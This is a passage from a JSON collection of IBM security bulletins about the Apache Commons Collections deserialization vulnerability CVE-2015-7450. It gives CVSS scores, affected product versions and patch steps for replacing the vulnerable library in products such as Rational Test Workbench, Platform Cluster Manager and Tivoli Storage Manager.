\n2\\. Go to the Rational Test Control Panel installation directory. \n \nOn Windows this is usually: \n \n64 bit: C:\\Program Files\\IBM\\RationalTestControlPanel\\ \n32 bit: C:\\Program Files (x86)\\IBM\\RationalTestControlPanel\\ \n \nOn AIX, Linux and Solaris this is usually: \n \n/opt/ibm/RationalTestControlPanel/ \n \n3\\. Navigate to the following directory inside the installation directory: \n \nusr/servers/RTCPServer/apps/ \n \n4\\. Delete the directory called \"RTCP.war\". \n \n5\\. Restore the directory called \"RTCP.war\" from the safe backup location that you copied it to in step 10 of the fix's installation instructions. \n \n6\\. Go to the Rational Test Control Panel workspace. 
\n \nOn Windows this is usually: \n \nC:\\IBM\\RTCP-Workspace\\ \n \nOn AIX, Linux and Solaris this is usually: \n \n/var/RTCP/ \n \n7\\. Restore files that you copied in step 5 of the fix's installation instructions back from the safe backup location. \n \n**General notes:** \nWhen updating an installation to a later version of Rational Test Control Panel, check the later version's release notes to verify that this fix has been included in that version. This fix is not appropriate for any versions other than the exact ones specified in this fix's installation instructions. \n \nWhen removing an installation that has had the security fix applied, IBM Installation Manager may not remove all the files, and some files may have to be removed manually. To remove those files, delete the Rational Test Control Panel installation directory after the uninstallation process in IBM Installation Manager has been completed. \n \nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T05:08:13", "type": "ibm", "title": "Security Bulletin: Vulnerability in Spring Framework for Java Deserialization in Rational Test Control Panel in Rational Test Workbench and Rational Test Virtualization Server (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T05:08:13", "id": "0A096E5B1166FA9EA2FBE248B1FBD4328C1A90DC4203B8F0EE373BED1B836904", "href": "https://www.ibm.com/support/pages/node/274789", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:48:48", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by Rational Integration Tester in Rational Test Workbench, Rational Test Control Panel in Rational Test Workbench and Rational Test Virtualization Server, and RIT Agent in Rational Test Virtualization Server and Rational Performance Test Server (see CVE-2015-7450).\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. 
\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Rational Integration Tester** component in Rational Test Workbench, **Rational Test Control Panel** component in Rational Test Workbench and Rational Test Virtualization Server, and **RIT Agent** in Rational Test Virtualization Server and Rational Performance Test Server versions: \n \nAll versions from **8.0** up to and including **8.7.1**\n\n## Remediation/Fixes\n\nThe fixes for the CVE(s) mentioned above have been incorporated into an interim fix available on Fix Central (<http://www-933.ibm.com/support/fixcentral/>). \n \nPlease follow the appropriate component instructions below: \n \n**Note: OS X instructions are provided for version 8.7.1 only** \n \n**Rational Test Control Panel (RTCP)** component in Rational Test Workbench (RTW) and Rational Test Virtualization Server (RTVS) \n1\\. Download the fix from Fix Central and unzip it to extract the library **_commons-collections-3.2.2.jar_** \n2\\. Stop the server \n3\\. For versions 8.0 to 8.5.0.x \no Delete the existing library 'commons-collections-3.2.1.jar' in RationalTestControlPanel/webapps/RTCP/WEB-INF/lib and replace it with 'commons-collections-3.2.2.jar' \n4\\. For versions 8.5.1.x to 8.7.1 \no Delete the existing library 'commons-collections-3.2.1.jar' in RationalTestControlPanel/usr/servers/RTCPServer/apps/RTCP.war/WEB-INF/lib and replace it with 'commons-collections-3.2.2.jar' \n5\\. Start the server \n \n**Note:** The default install location for RTCP is /opt/IBM/RationalTestControlPanel on AIX, Linux and Solaris, /Applications/IBM/RationalTestControlPanel on OS X (8.7.1 only) and C:\\Program Files\\IBM\\RationalTestControlPanel on Windows.
\n \n \n**Rational Integration Tester (RIT)** component in Rational Test Workbench (RTW) \n\n1\\. Download the fix from Fix Central and unzip it to a directory.\n\nFor versions 8.7.0.x and before, use **_com.springsource.org.apache.commons.collections_3.2.2.jar_**.\n\nFor version 8.7.1, use **_org.apache.commons.collections_3.2.2.jar_**.\n\n2\\. Close any running instances of Rational Integration Tester (and RIT Agent if installed on the same machine).\n\n3\\. Locate the **IBMIMShared** directory.\n\n4\\. Copy the appropriate file into the **IBMIMShared\\plugins** directory.\n\n5\\. Locate the \u201cbundles.info\u201d file. By default, the location of this file is:\n\n_{Installation Directory for RIT}\\configuration\\org.eclipse.equinox.simpleconfigurator_\n\n6\\. In the bundles.info file, find the line that references Commons Collections (search for commons.collections) and replace it with the appropriate option below: \n\n**For versions 8.7.0.x and before:**\n\ncom.springsource.org.apache.commons.collections,3.2.2,../IBMIMShared/plugins/com.springsource.org.apache.commons.collections_3.2.2.jar,4,false\n\n**For version 8.7.1:**\n\norg.apache.commons.collections,3.2.2,../IBMIMShared/plugins/org.apache.commons.collections_3.2.2.jar,4,false\n\n7\\. To verify that the changes have been made successfully, restart RIT from the command line with the following command:\n\n**GHTester.exe -clean -console**\n\nWhen the console window appears, verify that 3.2.2, not 3.2.1, is shown when you type:\n\n**ss apache.commons.collections**\n\n**Note:** The default location for the IBMIMShared directory is /Applications/IBM/IBMIMShared on OS X, /opt/ibm/IBMIMShared on AIX, Linux and Solaris, and C:\\Program Files\\IBM\\IBMIMShared on Windows.\n\n \n\n\n**Rational Integration Tester Agent (RIT Agent)** component in Rational Test Virtualization Server (RTVS) and Rational Performance Test Server (RPTS)\n\n1\\.
Download the fix from Fix Central and unzip it to a directory.\n\nFor versions 8.7.0.x and before, use **_com.springsource.org.apache.commons.collections_3.2.2.jar_**.\n\nFor version 8.7.1, use **_org.apache.commons.collections_3.2.2.jar_**.\n\n2\\. Close any running instances of RIT Agent (and Rational Integration Tester if installed on the same machine).\n\n3\\. Locate the **IBMIMShared** directory.\n\n4\\. Copy the unzipped file to the **IBMIMShared\\plugins** directory.\n\n5\\. Locate the \u201cbundles.info\u201d file. By default, the location of this file is:\n\n_{Installation Directory for RIT Agent}\\configuration\\org.eclipse.equinox.simpleconfigurator_\n\n6\\. In the bundles.info file, find the line that references Commons Collections (search for commons.collections) and replace it with the appropriate option below: \n\n**For versions 8.7.0.x and before:**\n\ncom.springsource.org.apache.commons.collections,3.2.2,../IBMIMShared/plugins/com.springsource.org.apache.commons.collections_3.2.2.jar,4,false\n\n**For version 8.7.1:**\n\norg.apache.commons.collections,3.2.2,../IBMIMShared/plugins/org.apache.commons.collections_3.2.2.jar,4,false\n\n7\\.
To verify that the changes have been made successfully, check that RTCP is running, and then restart the agent from the command line with the following command:\n\n**Agent.exe -clean -console**\n\nWhen the console window appears, verify that 3.2.2, not 3.2.1, is shown when you type:\n\n**ss apache.commons.collections**\n\n**Note:** The default location for the IBMIMShared directory is /Applications/IBM/IBMIMShared on OS X, /opt/ibm/IBMIMShared on AIX, Linux and Solaris, and C:\\Program Files\\IBM\\IBMIMShared on Windows.\n\n \n\n\n**General Notes:**\n\n \no When updating an installation to a later version of Rational Test Control Panel, Rational Integration Tester or RIT Agent, the security fix detailed above will have to be re-applied after the update \no When removing an installation that has had the security fix applied, not all the files will be removed by IBM Installation Manager, and some files will have to be removed manually \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T05:07:50", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects RIT and RTCP in Rational Test Workbench, RTCP and RIT Agent in Rational Test Virtualization Server, and RIT Agent in Rational Performance Test Server (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE",
"integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T05:07:50", "id": "C807C32A7883D1C2FC0D7B24C88A071FCA929D2C2A1604675B9EDBA17D0B0100", "href": "https://www.ibm.com/support/pages/node/273031", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-23T21:50:54", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Fabric Manager (IFM).\n\n## Vulnerability Details\n\n**CVE-ID:** [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>)\n\n**Description:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class.
By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system.\n\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <http://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nProduct | Affected Version \n---|--- \nIBM Fabric Manager | 4.1 \n \n## Remediation/Fixes:\n\nFirmware fix versions are available on Fix Central: \n<http://www.ibm.com/support/fixcentral/>.\n\nProduct | Fix Version \n---|--- \nIBM Fabric Manager \nibm_sw_ifm-4.1.04.0048_windows_32-64 \nibm_sw_ifm-4.1.04.0048_linux_32-64 | 4.1.04.0048 \n \nYou should verify applying this fix does not cause any compatibility issues.\n\n## Workarounds and Mitigations:\n\nNone.\n\n## References:\n\n * [Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide.html>)\n * [On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0>)\n\n**Related Information:** \n[IBM Secure Engineering Web Portal](<http://www-01.ibm.com/software/test/wenses/security/>) \n[IBM Product Security Incident Response Blog](<https://www.ibm.com/blogs/psirt/>) \n\n\n**Acknowledgement**\n\nNone.\n\n**Change History** \n17 May 2016: Original version published\n\n* The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n**Disclaimer**\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-31T02:25:02", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Fabric Manager (IFM) (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2019-01-31T02:25:02", "id": "8D5E5D7EAC96534F5A79125B211C9A28A28825BCA639C4FB6E2E30BC1F7F6639", "href": "https://www.ibm.com/support/pages/node/868478", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:53:32", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced Edition, and Platform HPC.\n\n## Vulnerability Details\n\n**CVEID:** [**CVE-2015-7450**](<https://vulners.com/cve/CVE-2015-7450>)\n\n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nPlatform Cluster Manager Standard Edition Version 4.1.0, 4.1.1 and 4.1.1.1 \n\nPlatform Cluster Manager Version 4.2.0, 4.2.0.1, 4.2.0.2 and 4.2.1\n\nPlatform HPC Version 4.1.1, 4.1.1.1, 4.2.0 and 4.2.1\n\n## Remediation/Fixes\n\nSee Workarounds\n\n## Workarounds and Mitigations\n\n**Platform Cluster Manager 4.2.x & Platform HPC 4.2.x**\n\n1\\. Download Apache Commons Collections 3.2.2 from [_http://commons.apache.org/proper/commons-collections/download_collections.cgi_](<http://commons.apache.org/proper/commons-collections/download_collections.cgi>)\n\n2\\. Extract the commons-collections-3.2.2.jar file and copy the extracted files to the management node.\n\n3\\. Back up your existing JAR files and replace them with the Apache Commons Collections 3.2.2 files. 
The existing JAR files that need to be replaced include:\n\n \n\u00b7 /opt/pcm/web-portal/perf/1.2/lib/commons-collections-3.1.jar \n\n\u00b7 /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/commons-collections-3.2.1.jar\n\n\u00b7 /opt/pcm/web-portal/docs/kc.war/WEB-INF/lib/commons-collections-3.2.1.jar\n\n\u00b7 /opt/pcm/activemq/lib/optional/commons-collections-3.2.1.jar\n\n\u00b7 /opt/pcm/pcmd/1.0/lib/external/commons-collections-3.2.1.jar\n\nIf high availability is enabled, in addition to the above files, replace the following JAR file on the standby management node.\n\n\u00b7 /opt/pcm/activemq/lib/optional/commons-collections-3.2.1.jar\n\n \n4\\. Restart services. If high availability is enabled, run the following commands on the active management node: \n\n \n# pcmhatool failmode -m manual \n\n# pcmadmin service stop --group all\n\n# pcmadmin service start --group all\n\n# pcmhatool failmode -m auto\n\nOtherwise, if high availability is not enabled, run the following commands on the active management node:\n\n# pcmadmin service stop --group all\n\n# pcmadmin service start --group all\n\n \n\n\n**Platform Cluster Manager 4.1.x & Platform HPC 4.1.x**\n\n1\\. Download Apache Commons Collections 3.2.2 from [_http://commons.apache.org/proper/commons-collections/download_collections.cgi_](<http://commons.apache.org/proper/commons-collections/download_collections.cgi>)\n\n2\\. Extract the commons-collections-3.2.2.jar file and copy the extracted files to the management node.\n\n3\\. Back up your existing JAR files and replace them with the Apache Commons Collections 3.2.2 files. The existing JAR files that need to be replaced include:\n\n \n\u00b7 /opt/pcm/web-portal/perf/1.2/lib/commons-collections-3.1.jar \n\n\u00b7 /opt/pcm/web-portal/perf/1.2/lib/commons-collections-3.2.1.jar\n\n\u00b7 /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/commons-collections-3.2.1.jar\n\n \n4\\. Restart services. 
If high availability is enabled, run the following commands on active management node: \n\n \n# pcmhatool failmode -m manual \n\n# pmcadmin stop\n\n# perfadmin stop all\n\n# perfadmin start all\n\n# pmcadmin start\n\n# pcmhatool failmode -m auto\n\nOtherwise, if high availability is not enabled, run the following commands on the active management node:\n\n# pmcadmin stop\n\n# perfadmin stop all\n\n# perfadmin start all\n\n# pmcadmin start\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-18T01:30:16", "type": "ibm", "title": "Security Bulletin: An Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced Edition, and Platform HPC.", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-18T01:30:16", "id": "EB93085B7374899EA5C0E8EA2497565106D942E650838AACC75C22BA9457AA10", "href": "https://www.ibm.com/support/pages/node/681933", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:33", "description": "## Summary\n\nA vulnerability for 
handling Java object deserialization in the Apache Commons Collections open source library has been reported. A vulnerable version of the library is included in templates shipped with WebSphere Industry Content Packs and IBM Business Process Manager Industry Packs.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n * WebSphere Industry Content Packs 7.0.0.0 through 7.0.0.3\n * IBM Business Process Manager Industry Packs 7.5.x\n\n## Remediation/Fixes\n\nArtifacts contained in WebSphere Industry Content Packs and IBM Business Process Manager Industry Packs can be customized and deployed on server products running on top of IBM WebSphere Application Server V7. Please review [Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21970575>) and download and install the suggested fixes.\n\n## Workarounds and Mitigations\n\nWhen building your own applications based on the templates provided in WebSphere Industry Content Packs and IBM Business Process Manager Industry Packs, make sure to include the latest version of Apache Commons Collections and remove all other versions. 
Specifically, replace commons-collections-3.2.1.jar with commons-collections-3.2.2.jar in all existing and new applications. \n\nA patched version is available for download on Apache's project web site: <https://commons.apache.org/proper/commons-collections/download_collections.cgi>\n\nIBM recommends that you review your entire environment to identify vulnerable releases of the open-source Apache Commons Collections and take appropriate mitigation and remediation actions.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:18", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons might affect WebSphere Industry Content Packs and IBM Business Process Manager Industry Packs (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:18", "id": "15C7A0230AF3A0F0FAFE62170A4B777259233446DB9DD93795C37C15DC353BED", "href": "https://www.ibm.com/support/pages/node/273063", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:37", "description": "## Summary\n\nIBM WebSphere Application Server is shipped as a component 
of WebSphere Business Compass. Information about a security vulnerability affecting WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nConsult the security bulletin [HTTP response splitting attack in WebSphere Application Server (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21970575>) for vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\nThis vulnerability affects WebSphere Business Compass V7.0.0._x_.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:13", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities have been identified in IBM WebSphere Application Server shipped with WebSphere Business Compass (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-15T07:04:13", "id": "213D617E4F9EE72EB68155881D93F2FB6687EAF279D0B4652098B6858AB1354A", "href": "https://www.ibm.com/support/pages/node/272359", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:55", "description": "## Summary\n\nAn Apache Commons 
Collections vulnerability for handling Java object deserialization was addressed by IBM Tivoli Composite Application Manager Agent for Application Diagnostics\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Tivoli Composite Application Manager for Application Diagnostics 7.1 and above\n\n## Workarounds and Mitigations\n\nThe affected components are: ITCAM Agent for WebSphere Applications, ITCAM Agent for J2EE, ITCAM Agent for HTTP Servers, and the WebSphere component used in ITCAM for Application Diagnostics Managing Server. \n\n 1. 
The instructions to replace commons-collections-3.2.jar with commons-collections-3.2.2.jar for each agent are:\n * ITCAM Agent for WebSphere Applications: <http://www-01.ibm.com/support/docview.wss?uid=swg21972189>\n * ITCAM Agent for J2EE: <http://www.ibm.com/support/docview.wss?uid=swg21972199>\n * ITCAM Agent for HTTP Servers: <http://www.ibm.com/support/docview.wss?uid=swg21972210>\n * The WebSphere Security Bulletin can be found at: <http://www-01.ibm.com/support/docview.wss?uid=swg21970575>\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T15:13:52", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Tivoli Composite Application Manager for Application Diagnostics (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2018-06-17T15:13:52", "id": "76A7E7DAF9C149B8FD66E19139F6112A525F103DF32693A1F4D43F31321E1A1E", "href": "https://www.ibm.com/support/pages/node/273585", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:55", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for 
handling Java object deserialization was addressed by IBM Tivoli Storage Manager for Virtual Environments: Data Protection for VMware (IBM Spectrum Protect for Virtual Environments) and the IBM Tivoli Storage FlashCopy Manager for VMware (IBM Spectrum Protect Snapshot).\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION**: Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nThe following products and versions are affected: \n\n * Tivoli Storage Manager for Virtual Environments: Data Protection for VMware \n\\- 7.1.0.0 through 7.1.3.x \n\\- 6.4.0.0 through 6.4.3 \n\\- 6.3.0.0 through 6.3.2.4\n * Tivoli Storage FlashCopy Manager for VMware \n\\- 4.1.0.0 through 4.1.3.x \n\\- 3.2.0.0 through 3.2.0.5 \n\\- 3.1.0.0 through 3.1.1.2\n\n## Remediation/Fixes\n\n**_Tivoli Storage Manager for VE: Data Protection for VMware Release_**\n\n| **_First Fixing VRMF Level_**| **_ \n \nClient_** \n**_Platform_**| **_Link to Fix / Fix Availability Target_** \n---|---|---|--- \n7.1| 